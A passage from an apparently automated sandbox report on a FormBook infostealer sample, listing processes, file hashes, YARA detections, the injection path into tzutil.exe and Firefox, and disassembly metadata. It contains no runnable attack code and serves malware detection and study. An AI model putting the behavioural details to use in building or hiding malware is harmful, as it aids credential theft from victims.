                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:15:37:47
                                                                  Start date:12/12/2024
                                                                  Path:C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe"
                                                                  Imagebase:0xd60000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:15:37:49
                                                                  Start date:12/12/2024
                                                                  Path:C:\Windows\SysWOW64\tzutil.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                                  Imagebase:0xf0000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:9
                                                                  Start time:15:38:02
                                                                  Start date:12/12/2024
                                                                  Path:C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe"
                                                                  Imagebase:0xd60000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:11
                                                                  Start time:15:38:14
                                                                  Start date:12/12/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6d20e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:7.6%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:103
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 26891 2a7a5d0 26895 2a7a6b8 26891->26895 26905 2a7a6c8 26891->26905 26892 2a7a5df 26896 2a7a6c8 26895->26896 26899 2a7a6fc 26896->26899 26915 2a78974 26896->26915 26899->26892 26900 2a7a6f4 26900->26899 26901 2a7a900 GetModuleHandleW 26900->26901 26902 2a7a92d 26901->26902 26902->26892 26906 2a7a6d9 26905->26906 26909 2a7a6fc 26905->26909 26907 2a78974 GetModuleHandleW 26906->26907 26908 2a7a6e4 26907->26908 26908->26909 26913 2a7a951 GetModuleHandleW 26908->26913 26914 2a7a960 GetModuleHandleW 26908->26914 26909->26892 26910 2a7a6f4 26910->26909 26911 2a7a900 GetModuleHandleW 26910->26911 26912 2a7a92d 26911->26912 26912->26892 26913->26910 26914->26910 26916 2a7a8b8 GetModuleHandleW 26915->26916 26918 2a7a6e4 26916->26918 26918->26899 26919 2a7a960 26918->26919 26922 2a7a951 26918->26922 26920 2a78974 GetModuleHandleW 26919->26920 26921 2a7a974 26920->26921 26921->26900 26923 2a7a960 26922->26923 26924 2a78974 GetModuleHandleW 26923->26924 26925 2a7a974 26924->26925 26925->26900 26797 2a74528 26798 2a74549 26797->26798 26801 2a74300 26798->26801 26800 2a74550 26802 2a7430b 26801->26802 26805 2a74310 26802->26805 26804 2a746e5 26804->26800 26806 2a7431b 26805->26806 26809 2a74330 26806->26809 26808 2a7487d 26808->26804 26810 2a7433b 26809->26810 26813 2a74360 26810->26813 26812 2a7495a 26812->26808 26814 2a7436b 26813->26814 26817 2a74390 26814->26817 26816 2a74a5c 26816->26812 26818 2a7439b 26817->26818 26824 2a77674 26818->26824 26820 2a77ba9 26820->26816 26821 2a77980 26821->26820 26829 2a7c698 26821->26829 26838 2a7c689 26821->26838 26825 2a7767f 26824->26825 26826 2a7916a 26825->26826 26847 2a791b8 26825->26847 26851 2a791c8 26825->26851 26826->26821 26830 2a7c6b9 26829->26830 26831 2a7c6dd 26830->26831 26834 2a7c77d 26830->26834 26855 2a7c8c7 26830->26855 26860 2a7c848 26830->26860 26864 2a7c839 26830->26864 26831->26820 26832 2a7c812 26832->26820 26833 2a7c8c7 2 API calls 26833->26834 26834->26832 26834->26833 26840 2a7c6b9 26838->26840 26839 2a7c6dd 26839->26820 26840->26839 26843 2a7c77d 26840->26843 26844 2a7c8c7 2 API calls 26840->26844 26845 2a7c839 2 API calls 26840->26845 26846 2a7c848 2 API calls 26840->26846 26841 2a7c812 26841->26820 26842 2a7c8c7 2 API calls 26842->26843 26843->26841 26843->26842 26844->26843 26845->26843 26846->26843 26848 2a7920b 26847->26848 26849 2a79216 KiUserCallbackDispatcher 26848->26849 26850 2a79240 26848->26850 26849->26850 26850->26826 26852 2a7920b 26851->26852 26853 2a79216 KiUserCallbackDispatcher 26852->26853 26854 2a79240 26852->26854 26853->26854 26854->26826 26856 2a7c8d5 26855->26856 26857 2a7c860 26855->26857 26856->26834 26858 2a7c88f 26857->26858 26869 2a7b420 26857->26869 26858->26834 26861 2a7c855 26860->26861 26862 2a7c88f 26861->26862 26863 2a7b420 2 API calls 26861->26863 26862->26834 26863->26862 26865 2a7c7f1 26864->26865 26867 2a7c842 26864->26867 26865->26834 26866 2a7c88f 26866->26834 26867->26866 26868 2a7b420 2 API calls 26867->26868 26868->26866 26870 2a7b425 26869->26870 26872 2a7d5a8 26870->26872 26873 2a7ca44 26870->26873 26874 2a7ca4f 26873->26874 26875 2a74390 2 API calls 26874->26875 26876 2a7d617 26875->26876 26876->26872 26877 2a7cd68 26878 2a7cdae 26877->26878 26882 2a7cf38 26878->26882 26885 2a7cf48 26878->26885 26879 2a7ce9b 26888 2a7b440 26882->26888 26886 2a7cf76 26885->26886 26887 2a7b440 DuplicateHandle 26885->26887 26886->26879 26887->26886 26889 2a7cfb0 DuplicateHandle 26888->26889 26890 2a7cf76 26889->26890 26890->26879

                                                                    Executed Functions

                                                                    Function 02A7A6C8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 24e069eee1c942219be905d0f431a8f7b90783f9046ab412c0aae6668068e385
                                                                    • Instruction ID: a02c1ea66084da2d549e7c1556c62bbb3af3c6512d575d19dee8357d4f60bd2b
                                                                    • Opcode Fuzzy Hash: 24e069eee1c942219be905d0f431a8f7b90783f9046ab412c0aae6668068e385
                                                                    • Instruction Fuzzy Hash: 79714670A00B059FDB24DF29D99475ABBF6FF88304F008A2DD48AD7A40DB34E946CB95
                                                                    Function 02A7B440 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 2a7b440-2a7d044 DuplicateHandle 61 2a7d046-2a7d04c 59->61 62 2a7d04d-2a7d06a 59->62 61->62
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A7CF76,?,?,?,?,?), ref: 02A7D037
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: f10ee6652f8f6087c20a9c61b3c1bc53b9a870d63b4cdbc643db5bd6c654042f
                                                                    • Instruction ID: fd58fd30e3573fdc48f9e6b7d06c9075d35475c133c7e2e1da6a35c6a536d1a9
                                                                    • Opcode Fuzzy Hash: f10ee6652f8f6087c20a9c61b3c1bc53b9a870d63b4cdbc643db5bd6c654042f
                                                                    • Instruction Fuzzy Hash: 012107B59003489FDB10CF9AD984ADEBBF4FB48310F14801AE914A3310C374A941CFA4
                                                                    Function 02A7CFA9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 65 2a7cfa9-2a7d044 DuplicateHandle 66 2a7d046-2a7d04c 65->66 67 2a7d04d-2a7d06a 65->67 66->67
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A7CF76,?,?,?,?,?), ref: 02A7D037
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 18a8a367c11136dafaea864733b53bb635edc2b1eef8fbc3dcc2890d217a8a74
                                                                    • Instruction ID: 1898796b7e0eb586f92dd95bc0ce829d596f8ca3bf14382c2cf15efb5d03e28e
                                                                    • Opcode Fuzzy Hash: 18a8a367c11136dafaea864733b53bb635edc2b1eef8fbc3dcc2890d217a8a74
                                                                    • Instruction Fuzzy Hash: FA21E2B5900249DFDB10CFAAD984AEEBFF4FB48310F14841AE958A3250C378AA45CF65
                                                                    Function 02A791B8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 70 2a791b8-2a79214 72 2a79216-2a7923e KiUserCallbackDispatcher 70->72 73 2a79262-2a7927b 70->73 74 2a79247-2a7925b 72->74 75 2a79240-2a79246 72->75 74->73 75->74
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02A7922D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: f1dc77d31963dabd433b00a5dbd07e2acf2606ee33c108a9b73c7eb303f579b0
                                                                    • Instruction ID: 720f5bbb6629a496dbfda2c2795e52788d8c1056792702e0016628fa4794f044
                                                                    • Opcode Fuzzy Hash: f1dc77d31963dabd433b00a5dbd07e2acf2606ee33c108a9b73c7eb303f579b0
                                                                    • Instruction Fuzzy Hash: 5B11EEB1804389CEEB20DF99C5013EEFFF4EB08318F14449AE098A3281C77D6644CBA5
                                                                    Function 02A78974 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 77 2a78974-2a7a8f8 79 2a7a900-2a7a92b GetModuleHandleW 77->79 80 2a7a8fa-2a7a8fd 77->80 81 2a7a934-2a7a948 79->81 82 2a7a92d-2a7a933 79->82 80->79 82->81
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,02A7A6E4), ref: 02A7A91E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 51f1648b1b1ef12ead591ddbbe1b9af4086f5515c401aee43a287376a24d849b
                                                                    • Instruction ID: 59f2effb07318107b30a9c19ee5d9c6f480d2d0788d4d50206e3c9f2b826bb94
                                                                    • Opcode Fuzzy Hash: 51f1648b1b1ef12ead591ddbbe1b9af4086f5515c401aee43a287376a24d849b
                                                                    • Instruction Fuzzy Hash: 0F1132B5C003499FDB20DF9AD844B9FFBF4EB88314F11802AD869A7201C7B8A505CFA5
                                                                    Function 02A791C8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 84 2a791c8-2a79214 86 2a79216-2a7923e KiUserCallbackDispatcher 84->86 87 2a79262-2a7927b 84->87 88 2a79247-2a7925b 86->88 89 2a79240-2a79246 86->89 88->87 89->88
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02A7922D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 90fd269ca28917fd92496191d94a5dba5f79e2bdb9fed16f95be6d97000a9515
                                                                    • Instruction ID: 539f5216eb4e750241292f43af61789379176625b28de485477d656b6d3293b7
                                                                    • Opcode Fuzzy Hash: 90fd269ca28917fd92496191d94a5dba5f79e2bdb9fed16f95be6d97000a9515
                                                                    • Instruction Fuzzy Hash: 6B118BB1804389CEEB20DF96D5457EEFFF8AB04318F14409AE498A3281CB796644CBA5
                                                                    Function 07CB48A8 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 91 7cb48a8-7cb4910 97 7cb4917-7cb491d 91->97 120 7cb4920 call 7cb8339 97->120 121 7cb4920 call 7cb4aae 97->121 122 7cb4920 call 7cb4d12 97->122 123 7cb4920 call 7cb4eb0 97->123 124 7cb4920 call 7cb5e07 97->124 98 7cb4926-7cb4a9f call 7cb46bc 120->98 121->98 122->98 123->98 124->98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*&/)(#$^@!~-_
                                                                    • API String ID: 0-3325533558
                                                                    • Opcode ID: 3f896640127b9f50ca24e28f6d7f7b939cfd4379ea0d332b8763ead79d89b5e6
                                                                    • Instruction ID: 84973664f38f153af0b2e929182db53cfd320a25bf76865b315326ebb6f4cb83
                                                                    • Opcode Fuzzy Hash: 3f896640127b9f50ca24e28f6d7f7b939cfd4379ea0d332b8763ead79d89b5e6
                                                                    • Instruction Fuzzy Hash: 9551D271B042509BD7047F74E85679E3BA2BF88700F4588BCE9899F28ADF7A190987D1
                                                                    Function 07CB48B8 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 125 7cb48b8-7cb491d 153 7cb4920 call 7cb8339 125->153 154 7cb4920 call 7cb4aae 125->154 155 7cb4920 call 7cb4d12 125->155 156 7cb4920 call 7cb4eb0 125->156 157 7cb4920 call 7cb5e07 125->157 131 7cb4926-7cb4a9f call 7cb46bc 153->131 154->131 155->131 156->131 157->131
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %*&/)(#$^@!~-_
                                                                    • API String ID: 0-3325533558
                                                                    • Opcode ID: 2b5018fa113e8a1e5952c78b63524f4c317680003af0ff47e4490b6ea8e62d0a
                                                                    • Instruction ID: dbdb353392157f1a2c7c78436b2d51b03625cdab395cd154d482f50d85d353f9
                                                                    • Opcode Fuzzy Hash: 2b5018fa113e8a1e5952c78b63524f4c317680003af0ff47e4490b6ea8e62d0a
                                                                    • Instruction Fuzzy Hash: 2641C2717042509BD7147F74A85679E7BA2BFC8700F0488BCED899F28ADF7A190987D1
                                                                    Function 07CB14A8 Relevance: .5, Instructions: 523COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 697 7cb14a8-7cb1555 704 7cb155b-7cb15ee 697->704 710 7cb15f2-7cb15fb 704->710 711 7cb15f0 704->711 712 7cb15ff-7cb1608 710->712 713 7cb15fd 710->713 711->710 714 7cb160a 712->714 715 7cb1610-7cb1614 712->715 713->712 714->715 716 7cb175c-7cb1765 714->716 717 7cb161b 715->717 718 7cb1616-7cb1619 715->718 719 7cb176d-7cb179b 716->719 720 7cb1767 716->720 721 7cb161e-7cb1655 717->721 718->721 723 7cb179d-7cb17a0 719->723 724 7cb17a2-7cb17a6 719->724 720->719 722 7cb188b-7cb190d call 7cb0338 720->722 725 7cb165c-7cb1660 721->725 726 7cb1657-7cb165a 721->726 743 7cb191b 722->743 744 7cb190f-7cb1919 722->744 723->724 729 7cb17a9-7cb17ad 723->729 724->729 727 7cb1663-7cb1667 725->727 726->725 726->727 730 7cb1669-7cb166c 727->730 731 7cb166e 727->731 733 7cb17af-7cb17b2 729->733 734 7cb17b4 729->734 735 7cb1671-7cb16a8 730->735 731->735 736 7cb17b7-7cb17ee 733->736 734->736 737 7cb16aa-7cb16ad 735->737 738 7cb16af-7cb16b3 735->738 740 7cb17f0-7cb17f3 736->740 741 7cb17f5-7cb17f9 736->741 737->738 742 7cb16b6-7cb16ba 737->742 738->742 740->741 745 7cb17fc-7cb182a 740->745 741->745 746 7cb16bc-7cb16bf 742->746 747 7cb16c1 742->747 748 7cb191d-7cb191f 743->748 744->748 749 7cb182c-7cb182f 745->749 750 7cb1831-7cb1835 745->750 751 7cb16c4-7cb16fb 746->751 747->751 752 7cb1a17-7cb1a1b 748->752 753 7cb1925-7cb1a0f call 7cb0348 748->753 749->750 754 7cb1838-7cb183c 749->754 750->754 757 7cb16fd-7cb1700 751->757 758 7cb1702-7cb1706 751->758 755 7cb1a29 752->755 756 7cb1a1d-7cb1a27 752->756 753->752 759 7cb183e-7cb1841 754->759 760 7cb1843 754->760 762 7cb1a2b-7cb1a2d 755->762 756->762 757->758 763 7cb1709-7cb170d 757->763 758->763 761 7cb1846-7cb187d 759->761 760->761 769 7cb187f-7cb1882 761->769 770 7cb1884-7cb1888 761->770 765 7cb1a33-7cb1b1d call 7cb0348 762->765 766 7cb1b25-7cb1bab 762->766 767 7cb170f-7cb1712 763->767 768 7cb1714 763->768 765->766 787 7cb1bed-7cb1c43 766->787 788 7cb1bad-7cb1bb9 766->788 771 7cb1717-7cb174e 767->771 768->771 769->722 769->770 770->722 775 7cb1750-7cb1753 771->775 776 7cb1755-7cb1759 771->776 775->716 775->776 776->716 788->787 791 7cb1bbb-7cb1bd4 788->791 791->787 796 7cb1bd6-7cb1be5 791->796 796->787
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4ed1d426577a413d8be8f58345560e16d487f81598533c92992c1b4f7288557
                                                                    • Instruction ID: 019ef232d867bfe23503a95e35ad9296a58ac2938a14711d1151df68e8c75e50
                                                                    • Opcode Fuzzy Hash: c4ed1d426577a413d8be8f58345560e16d487f81598533c92992c1b4f7288557
                                                                    • Instruction Fuzzy Hash: 3242F370D1061DCFCB25EFA8C8946DCBBB1BF49300F558299D5497B264EB30AA99CF81
                                                                    Function 07CB1499 Relevance: .5, Instructions: 517COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 797 7cb1499-7cb1555 804 7cb155b-7cb15ee 797->804 810 7cb15f2-7cb15fb 804->810 811 7cb15f0 804->811 812 7cb15ff-7cb1608 810->812 813 7cb15fd 810->813 811->810 814 7cb160a 812->814 815 7cb1610-7cb1614 812->815 813->812 814->815 816 7cb175c-7cb1765 814->816 817 7cb161b 815->817 818 7cb1616-7cb1619 815->818 819 7cb176d-7cb179b 816->819 820 7cb1767 816->820 821 7cb161e-7cb1655 817->821 818->821 823 7cb179d-7cb17a0 819->823 824 7cb17a2-7cb17a6 819->824 820->819 822 7cb188b-7cb190d call 7cb0338 820->822 825 7cb165c-7cb1660 821->825 826 7cb1657-7cb165a 821->826 843 7cb191b 822->843 844 7cb190f-7cb1919 822->844 823->824 829 7cb17a9-7cb17ad 823->829 824->829 827 7cb1663-7cb1667 825->827 826->825 826->827 830 7cb1669-7cb166c 827->830 831 7cb166e 827->831 833 7cb17af-7cb17b2 829->833 834 7cb17b4 829->834 835 7cb1671-7cb16a8 830->835 831->835 836 7cb17b7-7cb17ee 833->836 834->836 837 7cb16aa-7cb16ad 835->837 838 7cb16af-7cb16b3 835->838 840 7cb17f0-7cb17f3 836->840 841 7cb17f5-7cb17f9 836->841 837->838 842 7cb16b6-7cb16ba 837->842 838->842 840->841 845 7cb17fc-7cb182a 840->845 841->845 846 7cb16bc-7cb16bf 842->846 847 7cb16c1 842->847 848 7cb191d-7cb191f 843->848 844->848 849 7cb182c-7cb182f 845->849 850 7cb1831-7cb1835 845->850 851 7cb16c4-7cb16fb 846->851 847->851 852 7cb1a17-7cb1a1b 848->852 853 7cb1925-7cb1a0f call 7cb0348 848->853 849->850 854 7cb1838-7cb183c 849->854 850->854 857 7cb16fd-7cb1700 851->857 858 7cb1702-7cb1706 851->858 855 7cb1a29 852->855 856 7cb1a1d-7cb1a27 852->856 853->852 859 7cb183e-7cb1841 854->859 860 7cb1843 854->860 862 7cb1a2b-7cb1a2d 855->862 856->862 857->858 863 7cb1709-7cb170d 857->863 858->863 861 7cb1846-7cb187d 859->861 860->861 869 7cb187f-7cb1882 861->869 870 7cb1884-7cb1888 861->870 865 7cb1a33-7cb1b1d call 7cb0348 862->865 866 7cb1b25-7cb1bab 862->866 867 7cb170f-7cb1712 863->867 868 7cb1714 863->868 865->866 887 7cb1bed-7cb1c43 866->887 888 7cb1bad-7cb1bb9 866->888 871 7cb1717-7cb174e 867->871 868->871 869->822 869->870 870->822 875 7cb1750-7cb1753 871->875 876 7cb1755-7cb1759 871->876 875->816 875->876 876->816 888->887 891 7cb1bbb-7cb1bd4 888->891 891->887 896 7cb1bd6-7cb1be5 891->896 896->887
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3967ff35af82c9c7b15b84c42db5534f4f25cff56c9f074cb91d16bf51c36a03
                                                                    • Instruction ID: 88e38cf93b9696cf9f74ec5d7b505969b6259729035763389e844404d495f8c4
                                                                    • Opcode Fuzzy Hash: 3967ff35af82c9c7b15b84c42db5534f4f25cff56c9f074cb91d16bf51c36a03
                                                                    • Instruction Fuzzy Hash: 5F42E370D1061DCFCB25EFA8C8946DCBBB1BF49300F558699E5497B264EB309A98CF81
                                                                    Function 07CB88E8 Relevance: .3, Instructions: 290COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 897 7cb88e8-7cb8911 898 7cb8913-7cb8934 897->898 899 7cb8970-7cb8980 897->899 898->899 904 7cb8936-7cb893c 898->904 902 7cb8b56-7cb8b5d 899->902 903 7cb8986-7cb8990 899->903 905 7cb8b5f-7cb8b67 call 7cb8438 902->905 906 7cb8b6c-7cb8b7f 902->906 907 7cb899a-7cb89a4 903->907 908 7cb8992-7cb8999 903->908 909 7cb894a-7cb894f 904->909 910 7cb893e-7cb8940 904->910 905->906 915 7cb89aa-7cb89ea 907->915 916 7cb8b89-7cb8c2a 907->916 912 7cb895c-7cb8969 909->912 913 7cb8951-7cb8955 909->913 910->909 912->899 913->912 925 7cb89ec-7cb89f2 915->925 926 7cb8a02-7cb8a06 915->926 944 7cb8c2c 916->944 945 7cb8c31-7cb8c67 916->945 927 7cb89f6-7cb89f8 925->927 928 7cb89f4 925->928 929 7cb8a08-7cb8a2d 926->929 930 7cb8a33-7cb8a4b call 7cb52d0 926->930 927->926 928->926 929->930 939 7cb8a58-7cb8a60 930->939 940 7cb8a4d-7cb8a52 930->940 942 7cb8a62-7cb8a70 939->942 943 7cb8a76-7cb8a95 939->943 940->939 942->943 948 7cb8aad-7cb8ab1 943->948 949 7cb8a97-7cb8a9d 943->949 944->945 956 7cb8c69 945->956 957 7cb8c71 945->957 953 7cb8b0a-7cb8b53 948->953 954 7cb8ab3-7cb8ac0 948->954 951 7cb8a9f 949->951 952 7cb8aa1-7cb8aa3 949->952 951->948 952->948 953->902 961 7cb8ac2-7cb8af4 954->961 962 7cb8af6-7cb8b03 954->962 956->957 963 7cb8c72 957->963 961->962 962->953 963->963
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 767d8c78c3c8dcde48e78ae3b5ea3fb9a015adea9998a2a0c152d754fed411d1
                                                                    • Instruction ID: b3d1a75425ba687e519af2ebcf0aa588a27f786706d0e37b2c720d6f61d2dbd5
                                                                    • Opcode Fuzzy Hash: 767d8c78c3c8dcde48e78ae3b5ea3fb9a015adea9998a2a0c152d754fed411d1
                                                                    • Instruction Fuzzy Hash: 32B16FB4B012059FDB15DB68D694BAEBBF6AF89710F2440A9E505EB3A1CB30DD01CB91
                                                                    Function 07CB7C10 Relevance: .2, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
